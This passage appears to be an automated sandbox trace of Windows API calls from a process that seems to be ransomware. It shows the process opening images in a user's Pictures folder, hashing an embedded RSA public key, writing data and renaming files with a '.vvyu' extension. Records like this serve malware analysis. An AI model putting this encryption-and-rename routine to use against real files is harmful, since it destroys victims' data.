returned 0x29f7e50 [0191.277] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0191.277] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0191.277] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0191.277] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0191.277] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0191.277] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0191.277] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0191.278] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0191.278] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6038 | out: hHeap=0x2c0000) returned 1 [0191.278] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0191.278] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6020 | out: hHeap=0x2c0000) returned 1 [0191.278] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0191.278] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0191.278] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6080 | out: hHeap=0x2c0000) returned 1 [0191.278] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0191.278] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0191.279] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0191.279] GetCurrentThreadId () returned 0x5d8 [0191.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0191.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae59b8 [0191.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0191.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0191.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0191.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0191.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0191.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0191.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0191.280] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0191.280] GetCurrentThreadId () returned 0x5d8 [0191.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0191.280] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0191.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0191.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0191.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0191.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0191.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0191.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0191.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0191.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0191.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40108 [0191.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0191.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0191.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0191.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6080 [0191.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0191.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0191.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0191.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0191.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0191.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0191.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0191.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0191.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6020 [0191.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0191.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0191.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0191.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0191.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0191.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0191.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0191.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6038 [0191.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0191.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0191.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0191.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6008 [0191.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0191.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6098 [0191.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0191.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0191.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0191.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6068 [0191.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0191.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6050 [0191.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0191.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae60b0 [0191.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6050 | out: hHeap=0x2c0000) returned 1 [0191.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6050 [0191.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6068 | out: hHeap=0x2c0000) returned 1 [0191.286] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0191.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0191.286] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0191.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0191.286] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0191.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6020 | out: hHeap=0x2c0000) returned 1 [0191.286] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6020 [0191.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0191.286] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af3f88 [0191.287] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6080 | out: hHeap=0x2c0000) returned 1 [0191.287] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0191.287] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae60b0 | out: hHeap=0x2c0000) returned 1 [0191.287] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4198 [0191.287] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0191.287] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0191.287] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0191.287] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0191.287] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6020 | out: hHeap=0x2c0000) returned 1 [0191.287] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af43b0 [0191.288] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0191.288] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0191.288] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0191.288] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0191.289] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0191.289] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0191.289] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0191.289] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0191.290] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4198 | out: hHeap=0x2c0000) returned 1 [0191.290] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b0 | out: hHeap=0x2c0000) returned 1 [0191.291] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0191.291] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0191.291] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6050 | out: hHeap=0x2c0000) returned 1 [0191.291] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0191.291] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6098 | out: hHeap=0x2c0000) returned 1 [0191.291] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0191.291] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6038 | out: hHeap=0x2c0000) returned 1 [0191.291] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6008 | out: hHeap=0x2c0000) returned 1 [0191.292] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0191.292] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0191.293] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0191.293] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5ff0 | out: hHeap=0x2c0000) returned 1 [0191.293] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af37c8 | out: hHeap=0x2c0000) returned 1 [0191.294] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0191.294] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0191.295] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0191.295] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0191.295] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0191.295] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0191.295] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0191.295] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0191.296] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0191.296] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0191.297] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfa00 | out: hHeap=0x2c0000) returned 1 [0191.297] WriteFile (in: hFile=0x584, lpBuffer=0x2ae6ea0*, nNumberOfBytesToWrite=0x17d3, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ae6ea0*, lpNumberOfBytesWritten=0x2f9fb14*=0x17d3, lpOverlapped=0x0) returned 1 [0191.297] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6ea0 | out: hHeap=0x2c0000) returned 1 [0191.297] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x17d8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.297] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0191.298] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0191.298] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ee78 [0191.298] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0191.298] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0191.298] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0191.299] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0191.299] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0191.299] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0191.299] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0191.299] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0191.300] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0191.300] CloseHandle (hObject=0x584) returned 1 [0191.301] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0191.301] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x870) returned 0x2af3f88 [0191.301] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0191.301] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\tQPcQXKKo-QTVp1zN.bmp" (normalized: "c:\\users\\keecfmwgj\\pictures\\tqpcqxkko-qtvp1zn.bmp"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\tQPcQXKKo-QTVp1zN.bmp.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\tqpcqxkko-qtvp1zn.bmp.vvyu")) returned 1 [0191.313] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0191.314] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0191.314] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0191.317] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbb48 | out: hHeap=0x2c0000) returned 1 [0191.317] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c8b7670, ftCreationTime.dwHighDateTime=0x1d89e22, ftLastAccessTime.dwLowDateTime=0xc42e2b20, ftLastAccessTime.dwHighDateTime=0x1d8a501, ftLastWriteTime.dwLowDateTime=0xc42e2b20, ftLastWriteTime.dwHighDateTime=0x1d8a501, nFileSizeHigh=0x0, nFileSizeLow=0x1870f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="uCbdvMv01ecUQrS5kFhR.gif", cAlternateFileName="UCBDVM~1.GIF")) returned 1 [0191.317] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af37c8 [0191.317] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbb48 [0191.317] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af37c8 | out: hHeap=0x2c0000) returned 1 [0191.317] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\uCbdvMv01ecUQrS5kFhR.gif") returned=".gif" [0191.317] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\uCbdvMv01ecUQrS5kFhR.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\ucbdvmv01ecuqrs5kfhr.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0191.318] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=100111) returned 1 [0191.318] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0191.321] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x186e9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.321] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0191.322] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0191.322] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0191.322] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0191.323] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x1870f, lpOverlapped=0x0) returned 1 [0191.324] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0191.324] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0191.324] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0191.324] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0191.324] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0191.325] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0191.325] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0191.325] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0191.325] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0191.325] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0191.325] GetLastError () returned 0x0 [0191.325] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0191.325] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0191.326] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0191.326] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0191.326] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0191.326] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0191.326] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0191.326] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0191.326] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0191.326] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18710) returned 0x2af5168 [0191.326] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0191.327] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0191.327] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adfa00 [0191.327] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0191.327] RtlAllocateHeap (HeapHandle=0x2c0000, 